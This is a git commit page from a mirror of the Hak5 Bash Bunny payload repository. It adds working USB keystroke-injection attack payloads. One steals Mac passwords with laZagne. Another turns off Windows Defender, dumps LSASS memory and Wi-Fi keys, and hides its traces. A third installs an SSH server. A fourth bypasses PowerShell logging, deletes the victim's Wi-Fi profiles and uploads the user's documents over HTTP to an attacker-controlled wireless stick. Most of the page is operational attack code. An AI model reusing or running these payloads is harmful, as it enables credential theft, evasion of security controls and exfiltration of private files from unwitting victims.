hak5
/
bashbunny-payloads
mirror of https://github.com/hak5/bashbunny-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'hak5:master' into master

pull/480/head
0iphor13 2021-12-22 14:35:10 +01:00 committed by GitHub
parent 567040f9e7 b5fd8b50fc
commit d9bdd824f1
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
41 changed files with 39375 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

23704
payloads/library/credentials/MacPass/get-pip.py Normal file
View File

File diff suppressed because it is too large Load Diff

238
payloads/library/credentials/MacPass/laZagne.py Normal file
View File

@ -0,0 +1,238 @@
# -*- coding: utf-8 -*-
# !/usr/bin/python
##############################################################################
# #
# By Alessandro ZANNI #
# #
##############################################################################
# Disclaimer: Do Not Use this program for illegal purposes ;)
import argparse
import logging
import sys
import os
import time
# Configuration
from lazagne.config.write_output import write_in_file, StandardOutput
from lazagne.config.manage_modules import get_categories
from lazagne.config.constant import constant
from lazagne.config.run import run_lazagne, create_module_dic
# Object used to manage the output / write functions (cf write_output file)
constant.st = StandardOutput()
modules = create_module_dic()
def output(output_dir=None, txt_format=False, json_format=False, all_format=False):
if output_dir:
if os.path.isdir(output_dir):
constant.folder_name = output_dir
else:
print('[!] Specify a directory, not a file !')
if txt_format:
constant.output = 'txt'
if json_format:
constant.output = 'json'
if all_format:
constant.output = 'all'
if constant.output:
if not os.path.exists(constant.folder_name):
os.makedirs(constant.folder_name)
# constant.file_name_results = 'credentials' # let the choice of the name to the user
if constant.output != 'json':
constant.st.write_header()
def quiet_mode(is_quiet_mode=False):
if is_quiet_mode:
constant.quiet_mode = True
def verbosity(verbose=0):
# Write on the console + debug file
if verbose == 0:
level = logging.CRITICAL
elif verbose == 1:
level = logging.INFO
elif verbose >= 2:
level = logging.DEBUG
formatter = logging.Formatter(fmt='%(message)s')
stream = logging.StreamHandler(sys.stdout)
stream.setFormatter(formatter)
root = logging.getLogger()
root.setLevel(level)
# If other logging are set
for r in root.handlers:
r.setLevel(logging.CRITICAL)
root.addHandler(stream)
def manage_advanced_options(user_password=None, dictionary_attack=None):
if user_password:
constant.user_password = user_password
if dictionary_attack:
constant.dictionary_attack = dictionary_attack
def clean_args(arg):
"""
Remove not necessary values to get only subcategories
"""
for i in ['output', 'write_normal', 'write_json', 'write_all', 'verbose', 'auditType', 'quiet']:
try:
del arg[i]
except Exception:
pass
return arg
def runLaZagne(category_selected='all', subcategories={}, password=None, interactive=False):
"""
This function will be removed, still there for compatibility with other tools
Everything is on the config/run.py file
"""
for pwd_dic in run_lazagne(
category_selected=category_selected,
subcategories=subcategories,
password=password,
interactive=interactive
):
yield pwd_dic
if __name__ == '__main__':
parser = argparse.ArgumentParser(description=constant.st.banner, formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('--version', action='version', version='Version ' + str(constant.CURRENT_VERSION),
help='laZagne version')
# ------------------------------------------- Permanent options ------------------------------------------
# Version and verbosity
PPoptional = argparse.ArgumentParser(
add_help=False,
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=constant.MAX_HELP_POSITION)
)
PPoptional._optionals.title = 'optional arguments'
PPoptional.add_argument('-i', '--interactive', default=False, action='store_true',
help='will prompt a window to the user')
PPoptional.add_argument('-password', dest='password', action='store',
help='user password used to decrypt the keychain')
PPoptional.add_argument('-attack', dest='attack', action='store_true',
help='500 well known passwords used to check the user hash (could take a while)')
PPoptional.add_argument('-v', dest='verbose', action='count', help='increase verbosity level', default=0)
PPoptional.add_argument('-quiet', dest='quiet', action='store_true',
help='quiet mode: nothing is printed to the output', default=False, )
# Output
PWrite = argparse.ArgumentParser(
add_help=False,
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=constant.MAX_HELP_POSITION)
)
PWrite._optionals.title = 'Output'
PWrite.add_argument('-oN', dest='write_normal', action='store_true', help='output file in a readable format')
PWrite.add_argument('-oJ', dest='write_json', action='store_true', help='output file in a json format')
PWrite.add_argument('-oA', dest='write_all', action='store_true', help='output file in all format')
PWrite.add_argument('-output', dest='output', action='store', help='destination path to store results (default:.)',
default='.')
# -------------------------------- Add options and suboptions to all modules ------------------------------
all_subparser = []
categories = get_categories()
for c in categories:
categories[c]['parser'] = argparse.ArgumentParser(
add_help=False,
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=constant.MAX_HELP_POSITION)
)
categories[c]['parser']._optionals.title = categories[c]['help']
# Manage options
categories[c]['subparser'] = []
for module in modules[c]:
m = modules[c][module]
categories[c]['parser'].add_argument(m.options['command'], action=m.options['action'], dest=m.options['dest'],
help=m.options['help'])
# Manage all sub options by modules
if m.suboptions:
tmp = []
for sub in m.suboptions:
tmp_subparser = argparse.ArgumentParser(
add_help=False,
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=constant.MAX_HELP_POSITION)
)
tmp_subparser._optionals.title = sub['title']
if 'type' in sub:
tmp_subparser.add_argument(sub['command'], type=sub['type'], action=sub['action'],
dest=sub['dest'], help=sub['help'])
else:
tmp_subparser.add_argument(sub['command'], action=sub['action'], dest=sub['dest'],
help=sub['help'])
tmp.append(tmp_subparser)
all_subparser.append(tmp_subparser)
categories[c]['subparser'] += tmp
# ------------------------------------------- Print all -------------------------------------------
parents = [PPoptional] + all_subparser + [PWrite]
dic = {'all': {'parents': parents, 'help': 'Run all modules'}}
for c in categories:
parser_tab = [PPoptional, categories[c]['parser']]
if 'subparser' in categories[c]:
if categories[c]['subparser']:
parser_tab += categories[c]['subparser']
parser_tab += [PWrite]
dic_tmp = {c: {'parents': parser_tab, 'help': 'Run %s module' % c}}
dic = dict(list(dic.items()) + list(dic_tmp.items()))
subparsers = parser.add_subparsers(help='Choose a main command')
for d in dic:
subparsers.add_parser(d, parents=dic[d]['parents'], help=dic[d]['help']).set_defaults(auditType=d)
# ------------------------------------------- Parse arguments -------------------------------------------
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = dict(parser.parse_args()._get_kwargs())
arguments = parser.parse_args()
# Define constant variables
output(
output_dir=args['output'],
txt_format=args['write_normal'],
json_format=args['write_json'],
all_format=args['write_all']
)
verbosity(verbose=args['verbose'])
manage_advanced_options(user_password=args.get('password', None), dictionary_attack=args.get('attack', None))
quiet_mode(is_quiet_mode=args['quiet'])
# Print the title
constant.st.first_title()
start_time = time.time()
category_selected = args['auditType']
subcategories = clean_args(args)
for r in runLaZagne(
category_selected=category_selected,
subcategories=subcategories,
password=args.get('password', None),
interactive=arguments.interactive
):
pass
write_in_file(constant.stdout_result)
constant.st.print_footer(elapsed_time=str(time.time() - start_time))

BIN
payloads/library/credentials/MacPass/lazagne.zip Normal file
View File

Binary file not shown.

44
payloads/library/credentials/MacPass/payload.txt Normal file
View File

@ -0,0 +1,44 @@
#!/bin/bash
#
# Title: Mac Password Grabber
# Author: Overtimedev
# Version: 1.0
#
# Steals Passwords Mac using laZagne.py then stashes them in /root/udisk/loot/MacPass
# s(Replace PASSWORD, with your vicims mac computer password in payload.txt)
#
# Amber..............Executing payload
# Green..............Finished
#
LED G R
ATTACKMODE HID STORAGE
lootdir=loot/MacPass
mkdir -p /root/udisk/$lootdir
QUACK GUI SPACE
QUACK DELAY 1000
QUACK STRING terminal
QUACK ENTER
QUACK DELAY 3000
QUACK STRING cd /Volumes/BashBunny/
QUACK ENTER
QUACK DELAY 1000
QUACK STRING python get-pip.py
QUACK ENTER
QUACK DELAY 3000
QUACK STRING pip install -r requirements.txt
QUACK ENTER
QUACK DELAY 3000
QUACK STRING python laZagne.py all -password PASSWORD -oN -output loot/MacPass
QUACK ENTER
QUACK DELAY 10000
QUACK STRING killall Terminal
QUACK ENTER
# Sync filesystem
sync
# Green LED for finished
LED G

25
payloads/library/credentials/MacPass/readme.md Normal file
View File

@ -0,0 +1,25 @@
# Mac Password Grabber for the BashBunny
* Author: Overtimedev
* Version: Version 1.0
* Target: OSX
## Description
Steals Mac Passwords using laZagne.py then stashes them in /loot/MacPass
1. put get-pip.py, laZagne.py and requirements.txt in the root folder of the bunny
2. unzip lazagne.zip into the root folder of the bunny
3. Replace PASSWORD, with your vicims mac computer password in payload.txt
## STATUS
| LED | Status |
| ------------------ | -------------------------------------------- |
| Amber | Executin Payload |
| Green | Attack Finished |

8
payloads/library/credentials/MacPass/requirements.txt Normal file
View File

@ -0,0 +1,8 @@
psutil; sys_platform == 'linux' or sys_platform == 'linux2'
secretstorage; sys_platform == 'linux' or sys_platform == 'linux2'
pyasn1
enum34; python_version < '3.4' and sys_platform == 'win32'
rsa; sys_platform == 'win32'
https://github.com/AlessandroZ/pypykatz/archive/master.zip; python_version < '3.4' and sys_platform == 'win32'
https://github.com/skelsec/pypykatz/archive/master.zip; python_version > '3.5' and sys_platform == 'win32'
pycryptodome

38
payloads/library/credentials/ducked/duck_code.txt Normal file
View File

@ -0,0 +1,38 @@
DELAY 5000
GUI d
DELAY 1200
GUI r
DELAY 1200
STRING powershell -nologo -noni -ep bypass
CTRL-SHIFT ENTER
DELAY 2000
LEFT
DELAY 1000
ENTER
DELAY 1000
STRING mode con:cols=100 lines=1
ENTER
DELAY 500
STRING Set-MpPreference -DisableRealtimeMonitoring $true
ENTER
DELAY 1000
STRING REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
ENTER
DELAY 200
STRING $usb = (gwmi win32_volume -f 'label="BASHBUNNY"').Name; powershell -nologo -noni -ep bypass -File $usb\payloads\switch1\run.ps1
ENTER
DELAY 35000
STRING function eject {$driveEject = New-Object -comObject Shell.Application;$driveEject.Namespace(17).ParseName("$usb").InvokeVerb("Eject")}
ENTER
DELAY 1000
STRING echo "Successful PWNd..."
ENTER
DELAY 1000
STRING eject
ENTER
DELAY 1000
STRING Set-MpPreference -DisableRealtimeMonitoring $false
ENTER
DELAY 1000
STRING exit
ENTER

9
payloads/library/credentials/ducked/payload.txt Normal file
View File

@ -0,0 +1,9 @@
#!/bin/bash
LED SETUP
ATTACKMODE STORAGE HID VID_0X0D8C PID_0X0012
LED ATTACK
LED R B
QUACK switch1/duck_code.txt
sync;sleep 1;sync
LED FINISH
LED G

13574
payloads/library/credentials/ducked/procdump.txt Normal file
View File

File diff suppressed because it is too large Load Diff

159
payloads/library/credentials/ducked/run.ps1 Normal file
View File

@ -0,0 +1,159 @@
## ##
## Ducked script by scaery v.1.0 ##
## ________ __ .___ ##
## \______ \ __ __ ____ | | __ ____ __| _/ ##
## | | \| | \_/ ___\| |/ // __ \ / __ | ##
## | ` \ | /\ \___| <\ ___// /_/ | ##
## /_______ /____/ \___ >__|_ \\___ >____ | ##
## \/ \/ \/ \/ \/ ##
## ##
## Windows Enumeration - LSASS Dump - Wifi Credential Dumper ##
## ##
####################################################################
$switch = "switch1"
$usb = (gwmi win32_volume -f 'label="BASHBUNNY"').Name
$usb_loot = "loot\"
$date = Get-Date -UFormat "%Y-%m-%d-%H-%M"
$loot = $usb + $usb_loot + $env:computername + "_" + $date
$usb_create = New-Item -ItemType directory $loot
$proc = "$usb\payloads\$switch\procdump.txt"
$proc_decode = certutil -decode $proc exec.exe
$procdump = "$usb\payloads\$switch\exec.exe"
$proc_run = cmd.exe /c exec.exe -ma lsass.exe -accepteula "$loot\$date-lsass.$env:computername.dmp"
$wifi = (netsh wlan show profiles) | Select-String '\:(.+)$' | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=$name key=clear)} | Out-File $loot\$date-wifidump.log
$lines="------------------------------------------"
function whost($a) {
Write-Host
Write-Host -ForegroundColor Green $lines
Write-Host -ForegroundColor Green " "$a
Write-Host -ForegroundColor Green $lines
}
whost "Windows Enumeration Script v 0.1
original by absolomb
modified by scaery
!!!!!!!!!"
$commands = [ordered]@{
'Basic System Information' = 'Start-Process "systeminfo" -NoNewWindow -Wait';
'Environment Variables' = 'Get-ChildItem Env: | ft Key,Value';
'Network Information' = 'Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address';
'DNS Servers' = 'Get-DnsClientServerAddress -AddressFamily IPv4 | ft';
'ARP cache' = 'Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State';
'Routing Table' = 'Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex';
'Network Connections' = 'Start-Process "netstat" -ArgumentList "-ano" -NoNewWindow -Wait | ft';
'Connected Drives' = 'Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft';
'Firewall Config' = 'Start-Process "netsh" -ArgumentList "firewall show config" -NoNewWindow -Wait | ft';
'Current User' = 'Write-Host $env:UserDomain\$env:UserName';
'User Privileges' = 'start-process "whoami" -ArgumentList "/priv" -NoNewWindow -Wait | ft';
'Local Users' = 'Get-LocalUser | ft Name,Enabled,LastLogon';
'Logged in Users' = 'Start-Process "qwinsta" -NoNewWindow -Wait | ft';
'Credential Manager' = 'start-process "cmdkey" -ArgumentList "/list" -NoNewWindow -Wait | ft'
'User Autologon Registry Items' = 'Get-ItemProperty -Path "Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon" | select "Default*" | ft';
'Local Groups' = 'Get-LocalGroup | ft Name';
'Local Administrators EN' = 'Get-LocalGroupMember Administrators | ft Name, PrincipalSource';
'Local Administrators DE' = 'Get-LocalGroupMember Administratoren | ft Name, PrincipalSource';
'User Directories' = 'Get-ChildItem C:\Users | ft Name';
'Searching for SAM backup files' = 'Test-Path %SYSTEMROOT%\repair\SAM ; Test-Path %SYSTEMROOT%\system32\config\regback\SAM';
'Running Processes' = 'gwmi -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize';
'Installed Software Directories' = 'Get-ChildItem "C:\Program Files", "C:\Program Files (x86)" | ft Parent,Name,LastWriteTime';
'Software in Registry' = 'Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name';
'Folders with Everyone Permissions' = 'Get-ChildItem "C:\Program Files\*", "C:\Program Files (x86)\*" | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match "Everyone"} } catch {}} | ft';
'Folders with BUILTIN\User Permissions' = 'Get-ChildItem "C:\Program Files\*", "C:\Program Files (x86)\*" | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match "BUILTIN\Users"} } catch {}} | ft';
'Checking registry for AlwaysInstallElevated' = 'Test-Path -Path "Registry::HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer" | ft';
'Unquoted Service Paths' = 'gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike ''"*''} | select PathName, DisplayName, Name | ft';
'Scheduled Tasks' = 'Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State';
'Tasks Folder' = 'Get-ChildItem C:\Windows\Tasks | ft';
'Startup Commands' = 'Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl';
}
function RunCommands($commands) {
ForEach ($command in $commands.GetEnumerator()) {
whost $command.Name
Invoke-Expression $command.Value
}
}
# Disable Notifications
New-Item HKCU:\Software\Policies\Microsoft\Windows\Explorer -Force
$registryPath1 = "HKCU:\Software\Policies\Microsoft\Windows\Explorer"
$Name1 = "DisableNotificationCenter"
$value1 = "00000001"
IF(!(Test-Path $registryPath1)) {
New-Item -Path $registryPath1 -Force | Out-Null
New-ItemProperty -Path $registryPath1 -Name $Name1 -Value $value1 `
-PropertyType DWORD -Force | Out-Null
} ELSE {
New-ItemProperty -Path $registryPath1 -Name $Name1 -Value $value1 `
-PropertyType DWORD -Force | Out-Null
}
New-Item HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance -Force
$registryPath2 = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance"
$Name2 = "Enabled"
$value2 = "00000000"
IF(!(Test-Path $registryPath2)) {
New-Item -Path $registryPath2 -Force | Out-Null
New-ItemProperty -Path $registryPath2 -Name $Name2 -Value $value2 `
-PropertyType DWORD -Force | Out-Null
} ELSE {
New-ItemProperty -Path $registryPath2 -Name $Name2 -Value $value2 `
-PropertyType DWORD -Force | Out-Null
}
New-Item HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel -Force
$registryPath3 = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel"
$Name3 = "Enabled"
$value3 = "00000000"
IF(!(Test-Path $registryPath3)) {
New-Item -Path $registryPath3 -Force | Out-Null
New-ItemProperty -Path $registryPath3 -Name $Name3 -Value $value3 `
-PropertyType DWORD -Force | Out-Null
} ELSE {
New-ItemProperty -Path $registryPath3 -Name $Name3 -Value $value3 `
-PropertyType DWORD -Force | Out-Null
}
New-Item HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.AutoPlay -Force
$registryPath4 = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.AutoPlay"
$Name4 = "Enabled"
$value4 = "00000000"
IF(!(Test-Path $registryPath4)) {
New-Item -Path $registryPath4 -Force | Out-Null
New-ItemProperty -Path $registryPath4 -Name $Name4 -Value $value4 `
-PropertyType DWORD -Force | Out-Null
} ELSE {
New-ItemProperty -Path $registryPath4 -Name $Name4 -Value $value4 `
-PropertyType DWORD -Force | Out-Null
}
$notify_disable={
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\PushNotifications" -Name "ToastEnabled" -Type DWord -Value 0
}
$notify_enable={
Remove-Item $registryPath1 -Force | Out-Null
Remove-Item $registryPath2 -Force | Out-Null
Remove-Item $registryPath3 -Force | Out-Null
Remove-Item $registryPath4 -Force | Out-Null
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\PushNotifications" -Name "ToastEnabled" -Type DWord -Value 1
}
##################### EXECUTION STEPS ######################################
Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass -Force
Invoke-Command -Scriptblock $notify_disable
RunCommands($commands) > $loot\$date-winenum.log
whost "Procdump LSASS! AV-free! Caution: Not Defender aware!"
$proc_run
whost "Dumping Wifi Credentials to USB"
$wifi
whost "Hiding traces and notifications"
Invoke-Command -Scriptblock $notify_enable

27
payloads/library/execution/Win_PoSH_SSHServer/payload.txt Normal file
View File

@ -0,0 +1,27 @@
# Title: Win SSH server
# Description: Installs and runs a SSH Server on Windows.
# Author: Cribbit
# Version: 1.0
# Category: Execution
# Target: Windows 10 Creators Update (Powershell 5.1+)
# Attackmodes: HID
# Requirements: Admin Privileges and an Online Connection
# Notes: Add ` -StartupType 'Automatic'` after Start-Service to start ssh on boot
LED SETUP
ATTACKMODE HID
LED ATTACK
Q DELAY 200
# Admin Powershell need Windows 10 Creators Update
Q GUI x
Q STRING a
sleep 2
# Q ALT y this work for EN y=yes
# This works for all languages
Q LEFT
Q ENTER
sleep 5
Q STRING "Get-WindowsCapability -Online | ? Name -like 'OpenSSH.Server*' | ? State -EQ 'NotPresent' | % {Add-WindowsCapability -Online -Name \$_.Name}; Start-Service sshd"
# Q ENTER
LED FINISH

27
payloads/library/execution/Win_PoSH_SSHServer/readme.md Normal file
View File

@ -0,0 +1,27 @@
# SSH server
- Author: Cribbit
- Version: 1.0
- Target: Windows 10 Creators Update (Powershell)
- Category: Execution
- Attackmode: HID
## Change Log
| Version | Changes |
| ------- | --------------- |
| 1.0 | Initial release |
## Description
Installs and runs a SSH Server on Windows.
## Notes
This payload needs an admin powershell prompt and an internet connection to run.
## Configuration
Add ` -StartupType 'Automatic'` after Start-Service to start ssh on boot.
## Colours
| Status | Colour | Description |
| -------- | ----------------------------- | --------------------------- |
| SETUP | Magenta solid | Setting attack mode |
| ATTACK | Yellow single blink | Injecting Powershell script |
| FINISHED | Green blink followed by SOLID | Script is finished |

40
payloads/library/exfiltration/SanDisk-Wireless-Stick_Exfiltration/README.md Normal file
View File

@ -0,0 +1,40 @@
# Files Exfiltration with "SanDisk Wireless Stick"
- Title: "SanDisk Wireless Stick" Exfiltration
- Author: TW-D
- Version: 1.0
- Target: Microsoft Windows 10
- Category: Exfiltration
## Description
Uses the "SanDisk Wireless Stick" for files exfiltration.
1) Avoids "PowerShell Script Block Logging".
2) Hide "PowerShell" window.
3) Deletes Wi-Fi connection profiles in automatic mode, each deletion causes a disconnection.
4) Adds the profile for the "SanDisk Connect Wireless Stick" in automatic mode.
5) Checks whether the Wi-Fi interface is connected to the "SanDisk" and whether the gateway can be reached, if not, automatically starts again.
6) Exfiltration of the files via the HTTP channel.
## Configuration
In the web interface of the "SanDisk Wireless Stick" after update, change the following values :
![SanDisk-Configuration.png](./assets/SanDisk-Configuration.png)
From "payload.txt" change the values of the following constants :
```bash
######## INITIALIZATION ########
readonly BB_LABEL="BashBunny"
readonly SANDISK_SSID="HAK5-EXFIL"
readonly SANDISK_PSK="MyS3cr3TP@sSw0rD"
readonly SANDISK_LOOT="loots"
readonly USER_DIRECTORY="~\\"
readonly FILE_EXTENSION="*.txt,*.pdf,*.docx"
```
## Link
[SanDisk Vendor](https://www.sandisk.com/goto/connect)

BIN
payloads/library/exfiltration/SanDisk-Wireless-Stick_Exfiltration/assets/SanDisk-Configuration.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 22 KiB

159
payloads/library/exfiltration/SanDisk-Wireless-Stick_Exfiltration/payload.ps1 Normal file
View File

@ -0,0 +1,159 @@
#
# Author: TW-D
# Version: 1.0
#
param (
[string] $SSID,
[string] $PSK,
[string] $LOOT,
[string] $DIRECTORY,
[string] $EXTENSION
)
# Avoids "PowerShell Script Block Logging".
#
$etw_provider = [Ref].Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider").GetField("etwProvider", "NonPublic,Static")
$event_provider = New-Object System.Diagnostics.Eventing.EventProvider -ArgumentList @([Guid]::NewGuid())
$etw_provider.SetValue($null, $event_provider)
# Hide "PowerShell" window.
#
$Script:showWindowAsync = Add-Type -MemberDefinition @"
[DllImport("user32.dll")]
public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);
"@ -Name "Win32ShowWindowAsync" -Namespace Win32Functions -PassThru
$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0) | Out-Null
If ($SSID -And $PSK -And $LOOT -And $DIRECTORY -And $EXTENSION) {
# Deletes Wi-Fi connection profiles in automatic mode, each deletion causes a disconnection.
#
$interface_guid = (Get-NetAdapter -Physical -Name "Wi-Fi" | WHERE Status -eq "Up").InterfaceGuid
If ($interface_guid) {
$wlan_service_path = "C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\${interface_guid}\"
$wlan_service_items = Get-ChildItem -Path $wlan_service_path -Recurse
$wlan_service_items | ForEach-Object {
[xml] $xml_content = Get-Content -Path $_.FullName
$mode = $xml_content.WLANProfile.connectionMode
$name = $xml_content.WLANProfile.name
If ($mode -eq "auto") {
(NETSH WLAN DELETE PROFILE name="$name") | Out-Null
}
}
}
# Adds the profile for the "SanDisk Connect Wireless Stick" in automatic mode.
#
$profile_guid = "{" + [guid]::NewGuid().ToString() + "}"
$profile_path = "${env:TEMP}\${profile_guid}.xml"
$ssid_hex = ($SSID.ToCharArray() | ForEach-Object { [System.String]::Format("{0:X}", [System.Convert]::ToUInt32($_)) })
@"
<?xml version="1.0"?>
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
<name>${SSID}</name>
<SSIDConfig>
<SSID>
<hex>${ssid_hex}</hex>
<name>${SSID}</name>
</SSID>
</SSIDConfig>
<connectionType>ESS</connectionType>
<connectionMode>auto</connectionMode>
<MSM>
<security>
<authEncryption>
<authentication>WPA2PSK</authentication>
<encryption>AES</encryption>
<useOneX>false</useOneX>
</authEncryption>
<sharedKey>
<keyType>passPhrase</keyType>
<protected>false</protected>
<keyMaterial>${PSK}</keyMaterial>
</sharedKey>
</security>
</MSM>
<MacRandomization xmlns="http://www.microsoft.com/networking/WLAN/profile/v3">
<enableRandomization>false</enableRandomization>
</MacRandomization>
</WLANProfile>
"@ | Out-File -FilePath "${profile_path}"
(NETSH WLAN ADD PROFILE filename="${profile_path}") | Out-Null
Remove-Item -Path "${profile_path}" -Force
# Checks whether the Wi-Fi interface is connected to the "SanDisk".
# Whether the gateway can be reached.
# If not, automatically starts again.
#
While ($TRUE) {
$ConnectionError = $NULL
Try {
(NETSH WLAN CONNECT name="$SSID") | Out-Null
$wifi_connected = (Get-NetConnectionProfile).Name
$gateway_address = (Get-NetRoute -DestinationPrefix 0.0.0.0/0 | Select-Object -ExpandProperty NextHop)
$gateway_reachable = (Test-Connection -ComputerName $gateway_address -Quiet)
If ($wifi_connected -eq $SSID -And $gateway_reachable) {
Break
}
} Catch {
$ConnectionError = $_
Start-Sleep -Seconds 8
}
}
#
# Exfiltration of the files via the HTTP channel.
#
Function Invoke-CustomRequest($Url, $Method) {
$RequestError = $NULL
Try {
$request = [System.Net.WebRequest]::Create($Url)
$request.Method = $Method
$request.GetResponse().Close()
} Catch {
$RequestError = $_
return $FALSE
}
return $TRUE
}
Function Invoke-UploadRequest($Url, $File) {
$RestError = $NULL
Try {
$empty = [String]::IsNullOrWhiteSpace((Get-Content -Path $File))
If (!$empty) {
Invoke-RestMethod -Uri $Url -Method PUT -InFile $File
}
} Catch {
$RestError = $_
}
}
Function Exfiltration-Files($Directory, $Extension, $Url) {
$files = Get-ChildItem -Path $Directory -Include ($Extension.split(",")) -Recurse
ForEach ($file in $files) {
$random = ( -join ( (0x30..0x39) + ( 0x41..0x5A) + ( 0x61..0x7A) | Get-Random -Count 8 | % {[char]$_} ) )
$basename = Split-Path -Path "${file}" -Leaf -Resolve
Invoke-UploadRequest -Url "${Url}${random}-${basename}" -File "${file}" | Out-Null
}
}
$sandisk_loot = "http://${gateway_address}/myconnect/${LOOT}/"
$check_loot = Invoke-CustomRequest -Url $sandisk_loot -Method "GET"
If ($check_loot) {
Exfiltration-Files -Directory $DIRECTORY -Extension $EXTENSION -Url $sandisk_loot
} Else {
Invoke-CustomRequest -Url $sandisk_loot -Method "MKCOL" | Out-Null
Exfiltration-Files -Directory $DIRECTORY -Extension $EXTENSION -Url $sandisk_loot
}
# Cleanup
#
(NETSH WLAN DELETE PROFILE name="$SSID") | Out-Null
Exit
}

74
payloads/library/exfiltration/SanDisk-Wireless-Stick_Exfiltration/payload.txt Normal file
View File

@ -0,0 +1,74 @@
#!/bin/bash
#
# Title: SanDisk Wireless Stick Exfiltration
#
# Description: Files Exfiltration with "SanDisk Wireless Stick"
#
# Author: TW-D
# Version: 1.0
# Category: Exfiltration
# Target: Microsoft Windows 10
# Attackmodes: HID and STORAGE
#
# TESTED ON
# ===============
# Microsoft Windows 10 Family Version 1903 (PowerShell 5.1)
# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
#
# REQUIREMENTS
# ===============
# SanDisk Wireless Stick 16Go/32Go - Firmware 4.1.0 (2050)
#
# STATUS
# ===============
# Magenta solid ................................... SETUP
# Yellow single blink ............................. ATTACK
# Yellow double blink ............................. STAGE2
# Yellow triple blink ............................. STAGE3
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
#
######## INITIALIZATION ########
readonly BB_LABEL="BashBunny"
readonly SANDISK_SSID="HAK5-EXFIL"
readonly SANDISK_PSK="MyS3cr3TP@sSw0rD"
readonly SANDISK_LOOT="loots"
readonly USER_DIRECTORY="~\\"
readonly FILE_EXTENSION="*.txt,*.pdf,*.docx"
######## SETUP ########
LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
######## ATTACK ########
LED ATTACK
RUN WIN "powershell -NoLogo -NoProfile -ExecutionPolicy Bypass"
Q DELAY 5000
LED STAGE2
Q STRING "\$BB_VOLUME = \"\$((Get-WmiObject -Class Win32_Volume -Filter \"Label LIKE '${BB_LABEL}'\").Name)payloads\\${SWITCH_POSITION}\\\""
Q ENTER
Q DELAY 3500
Q STRING "CD \"\${BB_VOLUME}\""
Q ENTER
Q DELAY 1500
LED STAGE3
Q STRING ".\payload.ps1 -SSID \"${SANDISK_SSID}\" -PSK \"${SANDISK_PSK}\" -LOOT \"${SANDISK_LOOT}\" -DIRECTORY \"${USER_DIRECTORY}\" -EXTENSION \"${FILE_EXTENSION}\""
Q ENTER
Q DELAY 1500
######## FINISH ########
LED FINISH
shutdown -h 0

109
payloads/library/exfiltration/SmartDataThief_Exfiltrator/payload.txt Normal file
View File

@ -0,0 +1,109 @@
# Title: Smart Data Thief
# Description: Exfiltrates high value files from documents / desktop, gets all WiFi keys, shuts down after configurable
# time, may be triggered to start and / or stop by BLE, offers optional distraction on shutdown
# Author: saintcrossbow
# Props: Hak5Darren
# Version: 1.0
# Category: Exfiltration
# Target: Windows 10 with minimum powershell usage
# Attackmodes: HID, Storage
# Full Description
# ----------------
# The perfect versatile data thief with multiple configurations to tailor attacks towards an engagement. Attack is timed
# so you'll know exactly how much time you have with each target. See the configuraton section for modifications.
#
# Payload targets the following from the workstation:
# - All WiFi creds
# - The past 30 days in both Desktop and Documents
# - All Word docs, Excel spreadsheets, loose email files (*.msg), text files, and OneNote notebooks
#
